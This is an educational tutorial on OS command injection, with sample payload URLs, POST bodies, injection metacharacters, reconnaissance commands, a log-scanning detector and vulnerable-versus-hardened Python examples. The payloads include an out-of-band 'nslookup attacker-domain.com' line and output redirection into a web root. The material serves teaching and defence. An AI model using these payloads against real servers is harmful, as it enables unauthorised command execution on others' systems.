# OS Command Injection

## **What is OS Command Injection?**

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.

## **How It Works**

The attacker manipulates user input to inject malicious commands. For example:

1. Input is included in a backend command such as:

   ```
   stockreport.pl 432 32
   ```
2. Malicious input like `432 & echo hello &` modifies the command:

   ```bash
   stockreport.pl 432 & echo hello & 32
   ```

   The shell treats `&` as a command separator, so it runs `stockreport.pl 432`, then `echo hello`, then `32` (which fails as an unknown command). The injected `echo hello` therefore executes alongside the intended command.

## **Types of OS Command Injection**

### **1. Direct Injection**

The output of the injected command is visible in the application response.\
**Example:**

```text
https://insecure-website.com/stockStatus?productID=& echo hello &
```

If the response includes `hello`, the injection is successful.

### **2. Blind Injection**

The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:

* **Timing Attacks**:
  * Inject a time delay to observe the response time.

    ```text
    https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
    ```
* **File Writing**:
  * Write command output to a file accessible via the web.

    ```bash
    https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &
    ```
* **Out-of-Band Interaction**:
  * Trigger DNS lookups or HTTP requests to an attacker-controlled server.

    ```text
    https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &
    ```

## **Injection Characters**

The following characters can be used to inject commands:

| **Character**          | **Usage**                                                                                             |
| ---------------------- | ----------------------------------------------------------------------------------------------------- |
| `&`                    | Command separator on both Windows and Unix; on Unix the preceding command is run in the background.  |
| `&&`                   | Execute the next command only if the previous one succeeds.                                           |
| `;`                    | Separate multiple commands.                                                                           |
| Newline (`\n`, `0x0a`) | Separate commands (Unix-specific).                                                                    |

**Bash-Specific Characters**:

* `` ` `` (Backticks): Execute commands within the backticks.
* `$()` (Subshell): Execute commands within the parentheses.
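As an added defender-side example (not code from the original page), the separators above, plus `|` and `||` which the prevention list also blocks, turned into a detection check: it decodes the query string of constructed access-log lines and flags any parameter whose decoded name or value carries one of them.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Separators from the table above plus the pipe forms the prevention list
# blocks; matched after URL decoding, so %26, %3B, %0A, %60, %24%28 and %7C
# are caught as well as raw characters.
SHELL_META = re.compile(r"&&|\|\||[;&|`\n]|\$\(")

# Constructed sample access-log lines (not from the page), common log format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /stockStatus?productID=381&storeId=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /stockStatus?productID=%26+ping+-c+10+127.0.0.1+%26&storeId=1 HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /stockStatus?productID=1%3Bwhoami%3E/var/www/static/whoami.txt&storeId=1 HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /stockStatus?productID=%60nslookup+attacker-domain.com%60&storeId=1 HTTP/1.1" 200 17
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "POST /submit-form HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')


def suspicious_params(target: str) -> list[tuple[str, str]]:
    """Return (name, decoded value) pairs from the query string whose name or
    value contains a shell metacharacter. parse_qsl decodes %XX and '+'."""
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if SHELL_META.search(value) or SHELL_META.search(name)
    ]


def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, parameter, decoded value) for every flagged request.
    Only the query string is visible in an access log; POST bodies need
    request-body logging or a proxy/WAF that sees them."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group("target")):
            findings.append((client_ip, name, value))
    return findings
```

Legitimate `&` between parameters is never flagged, because `parse_qsl` splits on it before the check runs; only a decoded `&` inside a value is a hit.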

## **Examples of OS Command Injection**

### **Exploiting GET Parameters**

1. **Echo Command Injection**:

   ```text
   https://insecure-website.com/stockStatus?productID=& echo hello &
   ```
2. **Timing-Based Blind Injection**:

   ```text
   https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
   ```

### **Exploiting POST Parameters**

1. **Inject Commands into Form Fields**:

   ```http
   POST /submit-form HTTP/1.1

   csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing
   ```
2. **Redirect Output**:

   ```bash
   & whoami > /var/www/static/whoami.txt &
   ```

## **Useful Commands for Testing**

| **Purpose**              | **Linux Command** | **Windows Command** |
| ------------------------ | ----------------- | ------------------- |
| Current user             | `whoami`          | `whoami`            |
| Operating system         | `uname -a`        | `ver`               |
| Network configuration    | `ifconfig`        | `ipconfig /all`     |
| Open network connections | `netstat -an`     | `netstat -an`       |
| Running processes        | `ps -ef`          | `tasklist`          |

### **Advanced Techniques**

#### **Using Time Delays**

Inject a delay to observe execution:

```bash
& sleep 10 &
```

#### **Redirecting Output**

Write command output to a file accessible via the web:

```bash
& whoami > /var/www/static/whoami.txt &
```

#### **Out-of-Band Interaction**

Trigger DNS or HTTP requests to an attacker-controlled server:

```bash
& nslookup attacker-domain.com &
```

***

## **How to Prevent OS Command Injection**

1. **Avoid Shell Commands**:
   * Avoid passing user input to shell commands.
   * Use high-level APIs or libraries to handle tasks like file operations or process management.
2. **Validate User Input**:
   * Use a safelist to restrict allowed characters and commands.
   * Block special characters like `&`, `|`, `;`, and `` ` ``.
3. **Sanitize Input**:
   * Use escaping techniques appropriate to the shell environment.
4. **Use Strong Permissions**:
   * Limit the application's ability to execute shell commands or access sensitive files.
5. **Employ Security Measures**:
   * Use Web Application Firewalls (WAFs) to block malicious requests.
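As an added example (not code from the original page or the lab), the vulnerable `stockreport.pl` pattern from the How It Works section beside the hardened form that applies steps 1 and 2 above. `echo` stands in for `stockreport.pl` (an assumption) so the output shows exactly what the program received; it needs a POSIX system with `/bin/sh`.

```python
import re
import subprocess

# Stand-in for the page's stockreport.pl (assumption): "echo" prints its
# arguments, so its output shows exactly what the backend program received.
# Requires a POSIX system with /bin/sh and an echo binary.
REPORT_CMD = "echo"

# Constructed sample inputs: the page's benign call and its injected variant.
BENIGN = ("432", "32")
INJECTED = ("432 & echo hello &", "32")

# Safelist: the only thing a product or store ID may be is a short decimal.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def vulnerable_run(product_id: str, store_id: str) -> str:
    """Vulnerable pattern: input is concatenated into one string and handed
    to a shell, so '&' acts as a command separator and 'echo hello' runs."""
    cmd = f"{REPORT_CMD} {product_id} {store_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_run(product_id: str, store_id: str) -> str:
    """Hardened step 1: an argv list with shell=False (the default). No shell
    parses the arguments, so '&' reaches the program as an ordinary character
    inside one argument and nothing else is executed."""
    argv = [REPORT_CMD, product_id, store_id]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_valid_id(value: str) -> bool:
    """Hardened step 2: safelist validation of each parameter value."""
    return NUMERIC_ID.fullmatch(value) is not None


def validated_run(product_id: str, store_id: str) -> str:
    """Reject anything outside the safelist before a command is even built,
    then run it without a shell. Both layers matter: validation stops the bad
    input, and argv keeps a validation gap from becoming code execution."""
    for value in (product_id, store_id):
        if not is_valid_id(value):
            raise ValueError(f"rejected parameter value {value!r}")
    return argv_run(product_id, store_id)
```

With the injected input, `vulnerable_run` prints `hello` on its own line (the shell also reports `32` as an unknown command), while `argv_run` prints the whole string `432 & echo hello & 32` as plain text.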
